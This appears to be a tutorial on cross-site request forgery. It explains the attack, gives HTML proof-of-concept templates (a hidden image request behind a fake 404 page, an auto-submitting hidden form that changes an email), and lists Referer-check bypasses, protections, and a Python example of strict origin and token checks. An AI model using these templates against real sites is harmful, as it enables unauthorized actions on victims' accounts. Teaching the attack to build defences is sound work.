CSRF awareness

CSRF (Cross-site request forgery), also known as "One Click Attack" or Session Riding and usually abbreviated as CSRF or XSRF, is a malicious use of a website. It relies on the victim's authentication state (cookie, session, etc.) that has not yet expired: the victim is induced to click a malicious link or visit a page containing attack code, the browser sends requests to the server as the victim without the victim's knowledge, and an operation the victim never intended is completed.

HTTP Referer: Referer is part of the HTTP request header. When the browser (or a program simulating browser behavior) sends a request to the server, the header information contains Referer. The Referer in the HTTP header is mainly used to let the server determine the source page, that is, which page the user came from. Websites usually use it to count where users come from: a search page, a link from another website, a bookmark, etc., so that the website can position itself reasonably.

Types:

  1. GET request.

    To verify, simply log in to your account in another browser and open the URL. In use, the URL is placed in an HTML tag as a disguise.

    POC construction:

      <!-- the hidden image makes the browser issue the GET request with the victim's cookies -->
      <img src="url" border="0" style="display: none;"/>

      <!-- visible decoy content so the page looks like an ordinary error page -->
      <h1>404</h1>
      <h2>file not found.</h2>

  2. POST request.

    An HTML form needs to be constructed. Burp can generate it directly, or it can be written by hand.

     POC construction:

        <!DOCTYPE html>
        <html>
        <body>
        <!-- action: the endpoint that accepts the state-changing POST (left blank here) -->
        <form name="poc" action="" method="POST">
        <input type="hidden" name="newEmail" value="xx"/>
        <input type="submit" value="submit request" style="display: none;">
        </form>
        <script>
        // submit the form automatically as soon as the page loads
        document.forms["poc"].submit();
        </script>
        </body>
        </html>

Basic bypasses

(1). Referer checks that can be bypassed, depending on what the server verifies:

    (1). Whether the Referer belongs to the specified domain

    (2). Whether the Referer contains specified keywords

    (3). Whether the specified domain appears anywhere in the Referer

    (4). What happens when the Referer is empty

(2). Token

Protection

  (1). Verification code (CAPTCHA) on sensitive operations

  (2). Token: an encrypted, random token that the attacker cannot predict

  (3). Determine from the request headers whether the request has the same origin as the current page
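The following is an added example, not code from the original post: it puts the bypassable Referer check from the "Basic bypasses" list side by side with a strict origin check and a session-bound token, which are protections (2) and (3). The hostname `bank.example`, the header values and the secret are constructed for the demonstration, and binding the token to the session with an HMAC is one assumed way of implementing the "encrypted, random token".

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SITE_HOST = "bank.example"  # constructed hostname standing in for the protected site


def referer_allowed_weak(referer):
    """The kind of check the page lists as bypassable: it only asks whether the
    site's domain appears somewhere in the Referer, and it lets an empty Referer
    through."""
    if not referer:
        return True
    return SITE_HOST in referer


def referer_allowed_strict(referer):
    """Parse the header and compare scheme and hostname exactly; a missing
    Referer is treated as cross-site."""
    if not referer:
        return False
    parsed = urlparse(referer)
    return parsed.scheme == "https" and parsed.hostname == SITE_HOST


def request_is_same_origin(headers):
    """Protection (3): prefer the Origin header, fall back to Referer."""
    origin = headers.get("Origin")
    if origin:
        parsed = urlparse(origin)
        return parsed.scheme == "https" and parsed.hostname == SITE_HOST
    return referer_allowed_strict(headers.get("Referer"))


def issue_csrf_token(session_id, secret):
    """Protection (2): a random nonce, bound to the session with an HMAC so a
    token captured from one session is useless in another (assumed design)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def verify_csrf_token(token, session_id, secret):
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(mac, expected.hexdigest())
```

The weak check passes a Referer such as `https://bank.example.attacker.test/poc.html` or `https://attacker.test/?ref=bank.example`, which is exactly bypass cases (2) and (3); the strict check rejects both, and rejects the empty Referer of case (4).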
